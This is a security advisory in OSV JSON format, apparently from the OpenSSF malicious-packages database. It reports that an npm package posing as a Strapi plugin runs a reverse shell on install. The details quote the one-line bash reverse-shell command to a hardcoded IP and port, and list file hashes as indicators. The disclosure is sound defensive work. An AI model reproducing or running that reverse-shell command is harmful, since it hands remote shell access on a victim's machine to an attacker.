{"id":"MAL-2026-16193","summary":"Malicious code in strapi-plugin-yayccresh-meeb (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (de07e63ac0a0d5b02ad74abd90d075d73e80cdfcc1bbfbdfcfbe56460354735a)\nThe package's postinstall lifecycle script (`node postinstall.js`) executes a bash reverse shell that connects to the hardcoded remote endpoint 14.225.210.85:443 and redirects an interactive bash session's stdio through the socket (`bash -i \u003e /dev/tcp/14.225.210.85/443 0\u003e&1`). Running `npm install` on this package hands interactive shell access on the installer's machine to whoever controls that endpoint. The package advertises itself as a Strapi plugin but ships no plugin functionality — the postinstall reverse shell is the entire payload.\n","modified":"2026-09-15T16:31:10.197103601Z","published":"2026-09-15T15:54:06Z","database_specific":{"malicious-packages-origins":[{"versions":["3.6.8"],"id":"IN-MAL-2026-020055","import_time":"2026-09-15T16:19:14.86859428Z","modified_time":"2026-09-15T15:54:06Z","sha256":"de07e63ac0a0d5b02ad74abd90d075d73e80cdfcc1bbfbdfcfbe56460354735a","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/strapi-plugin-yayccresh-meeb/v/3.6.8"}],"affected":[{"package":{"name":"strapi-plugin-yayccresh-meeb","ecosystem":"npm","purl":"pkg:npm/strapi-plugin-yayccresh-meeb"},"versions":["3.6.8"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"ade0ab18babb5b39d37b48cea111dc2ba74344143279e5a3a4d90322a7c3ead10045de","path":"postinstall.js","sha256":"64197e7dd0a66dc744bda2d461cee1021bbe7d7e62a6ba4739f5c700a2223313"},{"path":"package.json","sha256":"bf30ea30155de1afbcf129b870588f53877b092b0e07e800b908201c5a38b554","tlsh":"7301495aca2455536dec3a94a81a1182a7264e478d81fc1c23b3011c8f0e2e7747f5dd"}],"package_integrity":[{"filename":"strapi-plugin-yayccresh-meeb-3.6.8.tgz","hashes":{"sha512_sri":"sha512-9W73tWjWZQguvkB+V6bWDPvj03ldXKW63b74qlfCBVFFZIqUYAmVJHizHxHK/2360Ou8gtxY9amh8TePiHsZog==","sha1":"7f32c0f298f0293ddfc02ba6ad0085f564bc51da"}}]},"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-yayccresh-meeb/MAL-2026-16193.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}